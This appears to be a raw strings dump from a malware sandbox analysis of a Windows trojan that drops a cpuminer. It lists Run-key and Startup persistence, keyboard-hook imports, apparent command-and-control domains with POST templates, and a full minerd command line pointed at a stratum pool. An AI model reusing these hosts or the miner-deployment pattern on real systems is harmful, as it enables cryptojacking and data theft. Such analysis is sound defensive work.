%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
%System%
xncqnyyorsxlq.exe
xncqnyyorsxlq.exe
wbohuxzhxt.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
libcurl.dll
2.5.1
2.5.1
%original file name%.exe_640_rwx_00330000_00004000:
.rdart
.rdart
32.dl
32.dl
2<3=4>5?6?7?8
2<3=4>5?6?7?8
ntdll.dll
ntdll.dll
%original file name%.exe_640_rwx_00340000_00021000:
.rdart
.rdart
32.dl
32.dl
2<3=4>5?6?7?8
2<3=4>5?6?7?8
%original file name%.exe_640_rwx_00370000_00033000:
.text
.text
`.rdata
`.rdata
@.data
@.data
user32.dll
user32.dll
kernel32.dll
kernel32.dll
ShellExecuteW
ShellExecuteW
shell32.dll
shell32.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
advapi32.dll
advapi32.dll
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
InternetOpenUrlW
InternetOpenUrlW
wininet.dll
wininet.dll
AM-U1_0.0.1
AM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
ntdll.dll
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
0=%s&1=%s
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
calc.exe
/index.php
/index.php
HTTP/1.1
HTTP/1.1
carpetbrownsurface.com
carpetbrownsurface.com
roofingropers.com
roofingropers.com
greenalgeaocean.com
greenalgeaocean.com
%original file name%.exe_640_rwx_00400000_00036000:
.text
.text
`.rdata
`.rdata
@.data
@.data
user32.dll
user32.dll
kernel32.dll
kernel32.dll
ShellExecuteW
ShellExecuteW
shell32.dll
shell32.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
advapi32.dll
advapi32.dll
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
InternetOpenUrlW
InternetOpenUrlW
wininet.dll
wininet.dll
|PAM-U1_0.0.1
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
0=%s&1=%s
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
calc.exe
/index.php
/index.php
HTTP/1.1
HTTP/1.1
carpetbrownsurface.com
carpetbrownsurface.com
roofingropers.com
roofingropers.com
greenalgeaocean.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
%System%
xncqnyyorsxlq.exe
xncqnyyorsxlq.exe
wbohuxzhxt.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
libcurl.dll
2.5.1
2.5.1
%original file name%.exe_640_rwx_00960000_00018000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
314127.64
314127.64
GetProcessWindowStation
GetProcessWindowStation
ActivateKeyboardLayout
ActivateKeyboardLayout
CreateDialogIndirectParamA
CreateDialogIndirectParamA
EnumChildWindows
EnumChildWindows
EnumThreadWindows
EnumThreadWindows
EnumWindows
EnumWindows
GetAsyncKeyState
GetAsyncKeyState
GetKeyNameTextA
GetKeyNameTextA
GetKeyState
GetKeyState
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayoutNameA
GetKeyboardLayoutNameA
GetKeyboardState
GetKeyboardState
LoadKeyboardLayoutA
LoadKeyboardLayoutA
MapVirtualKeyA
MapVirtualKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SetKeyboardState
SetKeyboardState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
USER32.dll
USER32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
OPENGL32.dll
OPENGL32.dll
CreateIoCompletionPort
CreateIoCompletionPort
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
u.vr-
u.vr-
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
File %PayloadOne was not foundYError: Unable to complete operation %PayloadOne, no %PayloadTwo file has been opened yet.
File %PayloadOne was not foundYError: Unable to complete operation %PayloadOne, no %PayloadTwo file has been opened yet.
File %PayloadOne already exists,Invalid Handle, unable to complete operation
File %PayloadOne already exists,Invalid Handle, unable to complete operation
-Failed to open file %PayloadOne, error %error*Not enough diskspace to complete operationOFailed to execute
-Failed to open file %PayloadOne, error %error*Not enough diskspace to complete operationOFailed to execute
Error: %error.MSI installation failed with error code %erroriAnother installation is already in progress
Error: %error.MSI installation failed with error code %erroriAnother installation is already in progress
Operation '%PayloadOne' was not foundYUser has canceled the operation, rolling back changes, If you see this message it's a bug{Insufficient Rights to complete operation
Operation '%PayloadOne' was not foundYUser has canceled the operation, rolling back changes, If you see this message it's a bug{Insufficient Rights to complete operation
Please be sure you have Administrator rights before attempting installation againDFailed to open requested registry key
Please be sure you have Administrator rights before attempting installation againDFailed to open requested registry key
Key: %PayloadOne
Key: %PayloadOne
Error: %error7Requested registry operation failed
Error: %error7Requested registry operation failed
Error: Invalid HiveJFailed to create the requested registry key
Error: Invalid HiveJFailed to create the requested registry key
Error: %errorJFailed to delete the requested registry key
Error: %errorJFailed to delete the requested registry key
Uninstall the newer version then run setup againIFatal error in the configuration file, examine the log file for more infouError: This product can only be installed on Windows XP or later. Windows 95, 98, ME, NT, and 2000 are not supported.@Failed to create a new thread
Uninstall the newer version then run setup againIFatal error in the configuration file, examine the log file for more infouError: This product can only be installed on Windows XP or later. Windows 95, 98, ME, NT, and 2000 are not supported.@Failed to create a new thread
Error: Unsupported Bitness
Error: Unsupported Bitness
`Unable to find a drive with sufficent free disk space in order to extract the installation files\Error: This product may not be installed on a computer that has Microsoft HyperV installed.oMicrosoft Runtime DLLs cannot be installed on this operating system. Please see Microsoft KB835732 for details.zYou may be running ACE instances. ACE is no longer supported in this version of VMware Player. Continue with installation?
`Unable to find a drive with sufficent free disk space in order to extract the installation files\Error: This product may not be installed on a computer that has Microsoft HyperV installed.oMicrosoft Runtime DLLs cannot be installed on this operating system. Please see Microsoft KB835732 for details.zYou may be running ACE instances. ACE is no longer supported in this version of VMware Player. Continue with installation?
Canceling Operation...
Canceling Operation...
P/L or /lang <English language name> : Specifies a language to run the installer.R/L or /lang <Localized language name> : Specifies a language to run the installer.]/L or /lang <Three letter language abbreviation> : Specifies a language to run the installer.F/L or /lang <Language id> : Specifies a language to run the installer.J/z or /var <"Key"="value" pairs> : Specify a set of variables to override.'/x or /uninst : Uninstalls the product.V/v or /msi_args <"Key"="value" pairs> : Specify a set of arguments to pass to the MSI.C/clean or /clean : Clean out installation registration information.|/nsr or /noSilentReboot : Suppress an automatic reboot after a successful silent install (does not affect installs with UI).</Language></Three></Localized></English>
P/L or /lang <English language name> : Specifies a language to run the installer.R/L or /lang <Localized language name> : Specifies a language to run the installer.]/L or /lang <Three letter language abbreviation> : Specifies a language to run the installer.F/L or /lang <Language id> : Specifies a language to run the installer.J/z or /var <"Key"="value" pairs> : Specify a set of variables to override.'/x or /uninst : Uninstalls the product.V/v or /msi_args <"Key"="value" pairs> : Specify a set of arguments to pass to the MSI.C/clean or /clean : Clean out installation registration information.|/nsr or /noSilentReboot : Suppress an automatic reboot after a successful silent install (does not affect installs with UI).</Language></Three></Localized></English>
minerd.exe_364:
.text
.text
``.data
``.data
.rdata
.rdata
0@.bss
0@.bss
.idata
.idata
libgcc_s_dw2-1.dll
libgcc_s_dw2-1.dll
libgcj-12.dll
libgcj-12.dll
JSON decode of %s failed
JSON decode of %s failed
http://
http://
https://
https://
stratum tcp://
stratum tcp://
http://%s
http://%s
cpuminer 2.3.2
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
Starting Stratum on %s
...terminating workio thread
...terminating workio thread
...retry after %d seconds
...retry after %d seconds
JSON decode failed(%d): %s
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' not found
JSON key '%s' is not a string
JSON key '%s' is not a string
CURL initialization failed
CURL initialization failed
%s%s%s
%s%s%s
Long-polling activated for %s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
%s: unsupported non-option argument '%s'
JSON option %s invalid
JSON option %s invalid
https:
https:
%s:%s
%s:%s
thread %d create failed
thread %d create failed
%d miner threads started, using '%s' algorithm.
%d miner threads started, using '%s' algorithm.
cert
cert
userpass
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
HTTP request failed: %s
JSON-RPC call failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
hex2bin failed on '%s'
DEBUG: %s
DEBUG: %s
Hash: %s
Hash: %s
Target: %s
Target: %s
http%s
http%s
http_proxy
http_proxy
Stratum connection failed: %s
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
mining.notify
Stratum session id: %s
Stratum session id: %s
mining.set_difficulty
mining.set_difficulty
client.reconnect
client.reconnect
stratum tcp://%s:%d
stratum tcp://%s:%d
Server requested reconnection to %s
Server requested reconnection to %s
client.get_version
client.get_version
cpuminer/2.3.2
cpuminer/2.3.2
client.show_message
client.show_message
MESSAGE FROM SERVER: %s
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near '%s'
%s near end of file
%s near end of file
unable to decode byte 0x%x at position %d
unable to decode byte 0x%x at position %d
control character 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
end == saved_text lex->saved_text.length
unable to open %s: %s
unable to open %s: %s
\ux
\ux
\ux\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: unrecognised option `-%s'
%s: invalid option -- %c
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
%s: unrecognised option `%s'
1404407002 5702
1404407002 5702
curl_easy_cleanup
curl_easy_cleanup
curl_easy_init
curl_easy_init
curl_easy_perform
curl_easy_perform
curl_easy_reset
curl_easy_reset
curl_easy_setopt
curl_easy_setopt
curl_global_init
curl_global_init
curl_slist_append
curl_slist_append
curl_slist_free_all
curl_slist_free_all
curl_version
curl_version
pthread_join
pthread_join
libcurl.dll
libcurl.dll
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
pthreadGC2.dll
pthreadGC2.dll
WS2_32.dll
WS2_32.dll
mainCRTStartup
mainCRTStartup
WinMainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_glob
_CRT_fmode
_CRT_fmode
_CRT_MT
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
wcrtomb
__mingwthr_key_t
__mingwthr_key_t
__mingwthr_key
__mingwthr_key
GNU C 4.5.2
GNU C 4.5.2
../mingw/crt1.c
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
../mingw/CRT_fp10.c
__report_error
__report_error
../mingw/crtst.c
../mingw/crtst.c
__mingwthr_run_key_dtors
__mingwthr_run_key_dtors
keyp
keyp
new_key
new_key
prev_key
prev_key
cur_key
cur_key
key_dtor_list
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
%flags
Þst
Þst
../../mingw/mingwex/wcrtomb.c
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
__wcrtomb_cp
crt1.c
crt1.c
CRTglob.c
CRTglob.c
CRTfmode.c
CRTfmode.c
CRT_fp10.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
crtst.c
wcrtomb.c
wcrtomb.c
"@"@"@"@
"@"@"@"@
minerd.exe_364_rwx_00400000_0004E000:
.text
.text
``.data
``.data
.rdata
.rdata
0@.bss
0@.bss
.idata
.idata
libgcc_s_dw2-1.dll
libgcc_s_dw2-1.dll
libgcj-12.dll
libgcj-12.dll
JSON decode of %s failed
JSON decode of %s failed
http://
http://
https://
https://
stratum tcp://
stratum tcp://
http://%s
http://%s
cpuminer 2.3.2
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
Starting Stratum on %s
...terminating workio thread
...terminating workio thread
...retry after %d seconds
...retry after %d seconds
JSON decode failed(%d): %s
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' not found
JSON key '%s' is not a string
JSON key '%s' is not a string
CURL initialization failed
CURL initialization failed
%s%s%s
%s%s%s
Long-polling activated for %s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
%s: unsupported non-option argument '%s'
JSON option %s invalid
JSON option %s invalid
https:
https:
%s:%s
%s:%s
thread %d create failed
thread %d create failed
%d miner threads started, using '%s' algorithm.
%d miner threads started, using '%s' algorithm.
cert
cert
userpass
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
HTTP request failed: %s
JSON-RPC call failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
hex2bin failed on '%s'
DEBUG: %s
DEBUG: %s
Hash: %s
Hash: %s
Target: %s
Target: %s
http%s
http%s
http_proxy
http_proxy
Stratum connection failed: %s
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
mining.notify
Stratum session id: %s
Stratum session id: %s
mining.set_difficulty
mining.set_difficulty
client.reconnect
client.reconnect
stratum tcp://%s:%d
stratum tcp://%s:%d
Server requested reconnection to %s
Server requested reconnection to %s
client.get_version
client.get_version
cpuminer/2.3.2
cpuminer/2.3.2
client.show_message
client.show_message
MESSAGE FROM SERVER: %s
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near '%s'
%s near end of file
%s near end of file
unable to decode byte 0x%x at position %d
unable to decode byte 0x%x at position %d
control character 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
end == saved_text lex->saved_text.length
unable to open %s: %s
unable to open %s: %s
\ux
\ux
\ux\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: unrecognised option `-%s'
%s: invalid option -- %c
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
%s: unrecognised option `%s'
1404407002 5702
1404407002 5702
curl_easy_cleanup
curl_easy_cleanup
curl_easy_init
curl_easy_init
curl_easy_perform
curl_easy_perform
curl_easy_reset
curl_easy_reset
curl_easy_setopt
curl_easy_setopt
curl_global_init
curl_global_init
curl_slist_append
curl_slist_append
curl_slist_free_all
curl_slist_free_all
curl_version
curl_version
pthread_join
pthread_join
libcurl.dll
libcurl.dll
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
pthreadGC2.dll
pthreadGC2.dll
WS2_32.dll
WS2_32.dll
mainCRTStartup
mainCRTStartup
WinMainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_glob
_CRT_fmode
_CRT_fmode
_CRT_MT
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
wcrtomb
__mingwthr_key_t
__mingwthr_key_t
__mingwthr_key
__mingwthr_key
GNU C 4.5.2
GNU C 4.5.2
../mingw/crt1.c
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
../mingw/CRT_fp10.c
__report_error
__report_error
../mingw/crtst.c
../mingw/crtst.c
__mingwthr_run_key_dtors
__mingwthr_run_key_dtors
keyp
keyp
new_key
new_key
prev_key
prev_key
cur_key
cur_key
key_dtor_list
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
%flags
Þst
Þst
../../mingw/mingwex/wcrtomb.c
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
__wcrtomb_cp
crt1.c
crt1.c
CRTglob.c
CRTglob.c
CRTfmode.c
CRTfmode.c
CRT_fp10.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
crtst.c
wcrtomb.c
wcrtomb.c
"@"@"@"@
"@"@"@"@